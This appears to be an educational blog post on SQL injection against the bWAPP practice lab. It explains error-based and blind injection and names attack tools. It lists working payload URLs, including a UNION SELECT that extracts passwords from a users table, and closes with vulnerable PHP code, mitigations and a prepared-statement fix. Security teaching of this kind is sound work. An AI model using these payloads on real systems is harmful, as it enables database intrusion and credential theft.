SQL Injection

How it works?

https://www.owasp.org/index.php/SQL_Injection

Basically, a SQL injection vulnerability is produced when code builds SQL queries from user input without properly filtering it. Because escape characters and SQL syntax are not filtered out, hackers can remotely execute their own SQL statements and get the results back.

ERROR BASED SQLI:

The first thing you will do is try a couple of tests, such as inserting a single quote ' or a double quote ". If the database returns an error, you will realize that the server has an error-based SQLi vulnerability, so you then try statements such as ORDER BY to see how many columns the query returns.

This will return an error saying something like Unknown column '7'.

This tells you that there is no column 7, which is good because you can then use

UNION STATEMENTS

to inject your own SELECT into those column positions and get results back. This is the basic procedure to follow, but it only works for error-based SQLi.


BLIND BASED SQLI:

When you come across an SQLi vulnerability that does not return an error, it might be blind SQLi. In this case it is best to use automated tools such as:

  • SQLMAP
  • SQLNinja
  • SQLSus

Why is it Dangerous?

SQL injection is dangerous because hackers can maliciously drop all the database entries and destroy the database, remotely access the database, or even upload a backdoor. Hackers are after information: this could be credit card information, social security numbers, emails, or passwords.


Some Commands

Test to see if the server is vulnerable:

http://192.168.20.131/bWAPP/sqli_1.php?title='&action=search

Check how many valid columns there are:

http://192.168.20.131/bWAPP/sqli_1.php?title=1'order by 1,2,3,4,5,6,7-- -&action=search

Check the version of the MySQL database:

http://192.168.20.131/bWAPP/sqli_1.php?title=1'union+select+1,@@version,3,4,5,6,7--+-&action=search

Retrieve the passwords from the users table:

http://192.168.20.131/bWAPP/sqli_1.php?title=1'union+select+1,(SELECT+GROUP_CONCAT(password+SEPARATOR+0x3c62723e)+FROM+users),3,4,5,6,7--+-&action=search


A Useful Tool

A useful tool for website hacking is HackBar.

It only works in Firefox.

https://addons.mozilla.org/en-US/firefox/addon/hackbar1/


Vulnerable Code

$var = $_POST['var'];  // raw request input, no validation or escaping
mysql_query("SELECT * FROM sometable WHERE id = $var");  // input spliced straight into the query text


How to deal with it.

Ways to avoid SQLi:

  • Parameterized statements.
  • Use stored procedures.
  • Escape all user-supplied input.


Do not use vulnerable PHP functions

$var = mysql_real_escape_string($_POST['var']);  // escaping only; the value is still concatenated into the SQL text

PHP comes with many built-in functions, such as addslashes, mysql_escape_string and mysql_real_escape_string.

Some of these functions have flaws and are being made obsolete.
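As an added example (not code from the original post), here is the post's vulnerable pattern beside a parameterized rewrite using PDO prepared statements, which is the first item in the list above. The DSN, the credentials, and the `sometable` schema with an `id` and a `title` column are assumed placeholders.

```php
<?php
// Added example, not code from the original post: the post's vulnerable
// pattern next to a PDO prepared-statement rewrite. The DSN, credentials,
// table `sometable` and column `title` are placeholders assumed for the demo.

$pdo = new PDO(
    'mysql:host=127.0.0.1;dbname=appdb;charset=utf8mb4', // placeholder DSN
    'app_user',                                            // placeholder user
    'app_password',                                        // placeholder password
    [
        PDO::ATTR_ERRMODE          => PDO::ERRMODE_EXCEPTION,
        PDO::ATTR_EMULATE_PREPARES => false, // real server-side prepares
    ]
);

// VULNERABLE (the pattern from the post): the request value is spliced into
// the SQL text, so a quote or a UNION inside $var rewrites the whole query.
function findByIdVulnerable(PDO $pdo, string $var): array
{
    return $pdo->query("SELECT * FROM sometable WHERE id = $var")
               ->fetchAll(PDO::FETCH_ASSOC);
}

// SAFE: the statement text is fixed before any user data is seen; the value
// travels as a typed parameter and is only ever compared as data.
function findById(PDO $pdo, string $var): array
{
    // Defence in depth: an id must be an integer, so reject anything else early.
    $id = filter_var($var, FILTER_VALIDATE_INT);
    if ($id === false) {
        return [];
    }
    $stmt = $pdo->prepare('SELECT * FROM sometable WHERE id = :id');
    $stmt->bindValue(':id', $id, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Free-text search like the post's `title` parameter: still parameterised.
// The LIKE wildcards are added to the bound value, never to the SQL text.
function searchByTitle(PDO $pdo, string $title): array
{
    $stmt = $pdo->prepare('SELECT id, title FROM sometable WHERE title LIKE :t');
    $stmt->execute([':t' => '%' . $title . '%']);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

var_dump(findById($pdo, (string) ($_POST['var'] ?? '')));
```

With `findById`, a value such as the post's `1' union select ...` never reaches the parser as SQL: it fails the integer check and is dropped, and even a numeric-looking value is bound as a parameter rather than pasted into the statement.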


Demonstration Of The Attack

If you have any questions please comment below.
